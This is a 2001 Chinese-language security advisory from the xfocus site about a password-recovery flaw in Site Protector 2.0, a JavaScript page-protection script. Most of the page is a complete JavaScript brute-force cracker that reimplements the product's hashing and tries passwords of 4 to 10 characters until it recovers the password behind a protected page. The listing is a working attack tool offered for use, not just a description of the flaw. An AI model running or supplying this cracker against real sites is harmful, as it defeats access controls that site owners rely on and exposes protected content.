xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version
 最近严重漏洞 
Microsoft RPC接口远程任意代码可执行漏洞
Cisco IOS接口不正确处理IPV4包远程拒绝服务漏洞
Microsoft Windows CreateFile API命名管道权限提升漏洞

Site Protector 存在密码可破解漏洞


发布时间:2001-10-09
更新时间:2001-10-09
严重程度:
威胁程度:口令恢复
错误类型:设计错误
利用方式:服务器模式

受影响系统
Site Protector version 2.0
详细描述
Site Protector(http://webdeveloper.earthweb.com/webjs/item/0,3602,12754_23741,00.html)是基于Javascript的站点保护程序,其中在算法中存在漏洞可以导致攻击者破解使用的密码。

测试代码
<!--
Site Protector v2.0 password cracker.

Author: isox [isox@chainsawbeer.com]
Group: hhp [hhp-programming.net]
URL: 0xc0ffee [0xc0ffee.com]

---
Simply grab the source of the page using site protector and look for the following code at the bottom of the page:
password=new preferences('<encrypted password here>', 15, 0, 1);
That is your encrypted password =)

Have fun and be cool,
  isox
---
//-->


<html>
  <head>
  <title>Site Unprotector -- Written by isox -- http://hhp-programming.net</title>
  <Scr!pt>
  <!--




var checkpass=''
tell=0
cracked=0
counttimes=0
disComp=0
bases=new Array(17,33,57,101);
var acharset='XYZNOhijkVWHIJ45ncdefMyzopqPQRSTUABKL6789ab_rs23CDEFGlmwtuvg01x'
var storeup='';





function preferences(encryptpass,encryptdepth,what,dis){
  disComp=dis
  tell=0
  tell=what
  checkpass=''
  counttimes=0
  times=encryptdepth
  checkpass=encryptpass
  orig=''
  this.check=mkasci
}




function mkasci(orig) {
  if(counttimes == 0) {
  storeup=orig
  }

  ascival = new Array()

  for(i=0; i<=orig.length-1; i++) {
  for(i1=0; i1<=acharset.length; i1++) {
  if(orig.charAt(i) == acharset.charAt(i1)) {
    ascival[i]=i1
  }
  }
  }

  themeat(ascival)
}





function themeat(basecode) {
  if(basecode.length >= 4) {
  counttimes++

  newcode=0
  finalcode=1

  for(count=0;count!=basecode.length;count++) {
  newcode = (basecode[(count<(basecode.length-1))?count+1:count-2]+(basecode[count]*bases[2])*(2.303)+basecode[Math.round(((basecode.length-1)*((Math.atan(basecode[(count!=0)?count-1:count+1])*basecode.length)+2*bases[0]))/100)]+1)
  newcode = cutoff(newcode)
  newcode = (newcode>basecode[Math.round(basecode.length/2)])?newcode-=bases[3]:newcode+=bases[3]
  finalcode = cutoff(((newcode/10)*finalcode)/(basecode.length-bases[0]))
  }

  var deconstruct=''
  eval('var finalcode="'+(finalcode+times)+'"');

  for(count=0;count<finalcode.length;count++) {
  if(!isNaN(finalcode.charAt(count))) {
    deconstruct = deconstruct+finalcode.charAt(count)
  }
  }

  finalcode = deconstruct
  var encrypt = new Array()

  for(count=2;count<finalcode.length+2;count+=2) {
  eval("encrypt["+((count/2)-1)+"]='"+((finalcode.charAt(count-2)!='0')?finalcode.charAt(count-2):'')+""+finalcode.charAt(count-1)+"'")
  encrypt[((count/2)-1)]=acharset.charAt(Math.round((acharset.length*encrypt[((count/2)-1)])/100))
  }

  encrypt=encrypt.join('')
  if(counttimes < times) {
  mkasci(encrypt)
  } else {
  counttimes=0

  if(encrypt == checkpass) {
    cracked = 1;
  }
  }
  }
}





function cutoff(code) {
  eval("var whatcode='"+code+"'");
  eval("var whatcode2='"+Math.ceil(code)+"'");
  bigVal = (Math.pow(10,whatcode.length-(whatcode2.length)-2)<1)?1:Math.pow(10,whatcode.length-(whatcode2.length)-2);
  whatcode3 = Math.round(code*bigVal)/bigVal
  return(whatcode3)
}
//-->

</SCRIPT>
</head>

<body bgcolor="#000000" text="silver" link="silver" vlink="white">
<!--TRY HACKING THIS//-->
<CENTER>Site Unprotector<br>Author: <a href="http://0xc0ffee.com/">isox</a> [<a href="mailto:isox@chainsawbeer.com">isox@chainsawbeer.com</a>]</CENTER>
<br><br><br>
<p>Please wait while I attempt to crack this password...</p>
<br>

<SCR!PT>
var encryptedpass = ''

while(encryptedpass.length < 4) {
  encryptedpass = prompt("Enter Encrypted Password to Crack", "");
}


password = new preferences(encryptedpass,15,0,1);
var foobar='';

// 4 character passwords
for(a=48; a<123; a++) {
  if(a == 58) {
  a = 65;
  }
  if(a == 91) {
  a = 95;
  }
  if(a == 96) {
  a = 97
  }

  for(b=48; b<123; b++) {
  if(b == 58) {
  b = 65;
  }
  if(b == 91) {
  b = 95;
  }
  if(b == 96) {
  b = 97
  }
  for(c=48; c<123; c++) {
  if(c == 58) {
    c = 65;
  }
  if(c == 91) {
    c = 95;
  }
  if(c == 96) {
    c = 97
  }
  for(d=48; d<123; d++) {
    if(d == 58) {
    d = 65;
    }
    if(d == 91) {
    d = 95;
    }
    if(d == 96) {
    d = 97
    }

    if(cracked == 1)
    break;

    foobar = String.fromCharCode(a, b, c, d);
    window.status = "Attempting to crack " + encryptedpass + ": " + foobar;
    password.check(foobar);
  }
  if(cracked == 1)
    break;
  }
  if(cracked == 1)
  break;
  }
  if(cracked == 1)
  break;
}


// 5 character passwords
for(a=48; a<123; a++) {
  if(a == 58) {
  a = 65;
  }
  if(a == 91) {
  a = 95;
  }
  if(a == 96) {
  a = 97
  }

  for(b=48; b<123; b++) {
  if(b == 58) {
  b = 65;
  }
  if(b == 91) {
  b = 95;
  }
  if(b == 96) {
  b = 97
  }
  for(c=48; c<123; c++) {
  if(c == 58) {
    c = 65;
  }
  if(c == 91) {
    c = 95;
  }
  if(c == 96) {
    c = 97
  }
  for(d=48; d<123; d++) {
    if(d == 58) {
    d = 65;
    }
    if(d == 91) {
    d = 95;
    }
    if(d == 96) {
    d = 97
    }
    for(e=48; e<123; e++) {
    if(e == 58) {
    e = 65;
    }
    if(e == 91) {
    e = 95;
    }
    if(e == 96) {
    e = 97
    }

    if(cracked == 1)
    break;

    foobar = String.fromCharCode(a, b, c, d, e);
    window.status = "Attempting to crack " + encryptedpass + ": " + foobar;
    password.check(foobar);
    }

    if(cracked == 1)
    break;
  }

  if(cracked == 1)
    break;
  }

  if(cracked == 1)
  break;
  }

  if(cracked == 1)
  break;
}


// 6 character passwords
for(a=48; a<123; a++) {
  if(a == 58) {
  a = 65;
  }
  if(a == 91) {
  a = 95;
  }
  if(a == 96) {
  a = 97
  }

  for(b=48; b<123; b++) {
  if(b == 58) {
  b = 65;
  }
  if(b == 91) {
  b = 95;
  }
  if(b == 96) {
  b = 97
  }
  for(c=48; c<123; c++) {
  if(c == 58) {
    c = 65;
  }
  if(c == 91) {
    c = 95;
  }
  if(c == 96) {
    c = 97
  }
  for(d=48; d<123; d++) {
    if(d == 58) {
    d = 65;
    }
    if(d == 91) {
    d = 95;
    }
    if(d == 96) {
    d = 97
    }
    for(e=48; e<123; e++) {
    if(e == 58) {
    e = 65;
    }
    if(e == 91) {
    e = 95;
    }
    if(e == 96) {
    e = 97
    }
    for(f=48; f<123; f++) {
    if(f == 58) {
      f = 65;
    }
    if(f == 91) {
      f = 95;
    }
    if(f == 96) {
      f = 97
    }

    if(cracked == 1)
      break;

    foobar = String.fromCharCode(a, b, c, d, e, f);
    window.status = "Attempting to crack " + encryptedpass + ": " + foobar;
    password.check(foobar);
    }

    if(cracked == 1)
    break;
    }

    if(cracked == 1)
    break;
  }

  if(cracked == 1)
    break;
  }

  if(cracked == 1)
  break;
  }

  if(cracked == 1)
  break;
}


// 7 character passwords
for(a=48; a<123; a++) {
  if(a == 58) {
  a = 65;
  }
  if(a == 91) {
  a = 95;
  }
  if(a == 96) {
  a = 97
  }

  for(b=48; b<123; b++) {
  if(b == 58) {
  b = 65;
  }
  if(b == 91) {
  b = 95;
  }
  if(b == 96) {
  b = 97
  }
  for(c=48; c<123; c++) {
  if(c == 58) {
    c = 65;
  }
  if(c == 91) {
    c = 95;
  }
  if(c == 96) {
    c = 97
  }
  for(d=48; d<123; d++) {
    if(d == 58) {
    d = 65;
    }
    if(d == 91) {
    d = 95;
    }
    if(d == 96) {
    d = 97
    }
    for(e=48; e<123; e++) {
    if(e == 58) {
    e = 65;
    }
    if(e == 91) {
    e = 95;
    }
    if(e == 96) {
    e = 97
    }
    for(f=48; f<123; f++) {
    if(f == 58) {
      f = 65;
    }
    if(f == 91) {
      f = 95;
    }
    if(f == 96) {
      f = 97
    }
    for(g=48; g<123; g++) {
      if(g == 58) {
      g = 65;
      }
      if(g == 91) {
      g = 95;
      }
      if(g == 96) {
      g = 97
      }

      if(cracked == 1)
      break;

      foobar = String.fromCharCode(a, b, c, d, e, f, g);
      window.status = "Attempting to crack " + encryptedpass + ": " + foobar;
      password.check(foobar);
    }

    if(cracked == 1)
      break;
    }

    if(cracked == 1)
    break;
    }

    if(cracked == 1)
    break;
  }

  if(cracked == 1)
    break;
  }

  if(cracked == 1)
  break;
  }

  if(cracked == 1)
  break;
}


// 8 character passwords
for(a=48; a<123; a++) {
  if(a == 58) {
  a = 65;
  }
  if(a == 91) {
  a = 95;
  }
  if(a == 96) {
  a = 97
  }

  for(b=48; b<123; b++) {
  if(b == 58) {
  b = 65;
  }
  if(b == 91) {
  b = 95;
  }
  if(b == 96) {
  b = 97
  }
  for(c=48; c<123; c++) {
  if(c == 58) {
    c = 65;
  }
  if(c == 91) {
    c = 95;
  }
  if(c == 96) {
    c = 97
  }
  for(d=48; d<123; d++) {
    if(d == 58) {
    d = 65;
    }
    if(d == 91) {
    d = 95;
    }
    if(d == 96) {
    d = 97
    }
    for(e=48; e<123; e++) {
    if(e == 58) {
    e = 65;
    }
    if(e == 91) {
    e = 95;
    }
    if(e == 96) {
    e = 97
    }
    for(f=48; f<123; f++) {
    if(f == 58) {
      f = 65;
    }
    if(f == 91) {
      f = 95;
    }
    if(f == 96) {
      f = 97
    }
    for(g=48; g<123; g++) {
      if(g == 58) {
      g = 65;
      }
      if(g == 91) {
      g = 95;
      }
      if(g == 96) {
      g = 97
      }
      for(h=48; h<123; h++) {
      if(h == 58) {
      h = 65;
      }
      if(h == 91) {
      h = 95;
      }
      if(h == 96) {
      h = 97
      }

      if(cracked == 1)
      break;

      foobar = String.fromCharCode(a, b, c, d, e, f, g, h);
      window.status = "Attempting to crack " + encryptedpass + ": " + foobar;
      password.check(foobar);
      }

      if(cracked == 1)
      break;
    }

    if(cracked == 1)
      break;
    }

    if(cracked == 1)
    break;
    }

    if(cracked == 1)
    break;
  }

  if(cracked == 1)
    break;
  }

  if(cracked == 1)
  break;
  }

  if(cracked == 1)
  break;
}


// 9 character passwords
for(a=48; a<123; a++) {
  if(a == 58) {
  a = 65;
  }
  if(a == 91) {
  a = 95;
  }
  if(a == 96) {
  a = 97
  }

  for(b=48; b<123; b++) {
  if(b == 58) {
  b = 65;
  }
  if(b == 91) {
  b = 95;
  }
  if(b == 96) {
  b = 97
  }
  for(c=48; c<123; c++) {
  if(c == 58) {
    c = 65;
  }
  if(c == 91) {
    c = 95;
  }
  if(c == 96) {
    c = 97
  }
  for(d=48; d<123; d++) {
    if(d == 58) {
    d = 65;
    }
    if(d == 91) {
    d = 95;
    }
    if(d == 96) {
    d = 97
    }
    for(e=48; e<123; e++) {
    if(e == 58) {
    e = 65;
    }
    if(e == 91) {
    e = 95;
    }
    if(e == 96) {
    e = 97
    }
    for(f=48; f<123; f++) {
    if(f == 58) {
      f = 65;
    }
    if(f == 91) {
      f = 95;
    }
    if(f == 96) {
      f = 97
    }
    for(g=48; g<123; g++) {
      if(g == 58) {
      g = 65;
      }
      if(g == 91) {
      g = 95;
      }
      if(g == 96) {
      g = 97
      }
      for(h=48; h<123; h++) {
      if(h == 58) {
      h = 65;
      }
      if(h == 91) {
      h = 95;
      }
      if(h == 96) {
      h = 97
      }
      for(i=48; i<123; i++) {
      if(i == 58) {
        i = 65;
      }
      if(i == 91) {
        i = 95;
      }
      if(i == 96) {
        i = 97
      }

      if(cracked == 1)
        break;

      foobar = String.fromCharCode(a, b, c, d, e, f, g, h, i);
      window.status = "Attempting to crack " + encryptedpass + ": " + foobar;
      password.check(foobar);
      }
      if(cracked == 1)
      break;
      }
      if(cracked == 1)
      break;
    }
    if(cracked == 1)
      break;
    }
    if(cracked == 1)
    break;
    }
    if(cracked == 1)
    break;
  }
  if(cracked == 1)
    break;
  }
  if(cracked == 1)
  break;
  }
  if(cracked == 1)
  break;
}


// 10 character passwords
for(a=48; a<123; a++) {
  if(a == 58) {
  a = 65;
  }
  if(a == 91) {
  a = 95;
  }
  if(a == 96) {
  a = 97
  }

  for(b=48; b<123; b++) {
  if(b == 58) {
  b = 65;
  }
  if(b == 91) {
  b = 95;
  }
  if(b == 96) {
  b = 97
  }
  for(c=48; c<123; c++) {
  if(c == 58) {
    c = 65;
  }
  if(c == 91) {
    c = 95;
  }
  if(c == 96) {
    c = 97
  }
  for(d=48; d<123; d++) {
    if(d == 58) {
    d = 65;
    }
    if(d == 91) {
    d = 95;
    }
    if(d == 96) {
    d = 97
    }
    for(e=48; e<123; e++) {
    if(e == 58) {
    e = 65;
    }
    if(e == 91) {
    e = 95;
    }
    if(e == 96) {
    e = 97
    }
    for(f=48; f<123; f++) {
    if(f == 58) {
      f = 65;
    }
    if(f == 91) {
      f = 95;
    }
    if(f == 96) {
      f = 97
    }
    for(g=48; g<123; g++) {
      if(g == 58) {
      g = 65;
      }
      if(g == 91) {
      g = 95;
      }
      if(g == 96) {
      g = 97
      }
      for(h=48; h<123; h++) {
      if(h == 58) {
      h = 65;
      }
      if(h == 91) {
      h = 95;
      }
      if(h == 96) {
      h = 97
      }
      for(i=48; i<123; i++) {
      if(i == 58) {
        i = 65;
      }
      if(i == 91) {
        i = 95;
      }
      if(i == 96) {
        i = 97
      }
      for(j=48; j<123; j++) {
        if(j == 58) {
        j = 65;
        }
        if(j == 91) {
        j = 95;
        }
        if(j == 96) {
        j = 97
        }

        if(cracked == 1)
        break;

        foobar = String.fromCharCode(a, b, c, d, e, f, g, h, i ,j);
        window.status = "Attempting to crack " + encryptedpass + ": " + foobar;
        password.check(foobar);
      }
      if(cracked == 1)
        break;
      }
      if(cracked == 1)
      break;
      }
      if(cracked == 1)
      break;
    }
    if(cracked == 1)
      break;
    }
    if(cracked == 1)
    break;
    }
    if(cracked == 1)
    break;
  }
  if(cracked == 1)
    break;
  }
  if(cracked == 1)
  break;
  }
  if(cracked == 1)
  break;
}

if(cracked == 1) {
  alert(checkpass + "has been successfully cracked. The magic word is: " + foobar);
  document.write("<br>" + checkpass + "has been successfully cracked. The magic word is: " + foobar);
  window.status = "Password has been successfully cracked";
} else {
  alert("I was unable to crack " + checkpass);
}
</SCRIPT>
</body>

</HTML>
(NOTE: The letter 'I' used inside SCRIPT Tags has been replaced with '!')

解决方案
尚无

相关信息
isox at chainsawbeer.com
Copyright © 1998-2003 XFOCUS Team. All Rights Reserved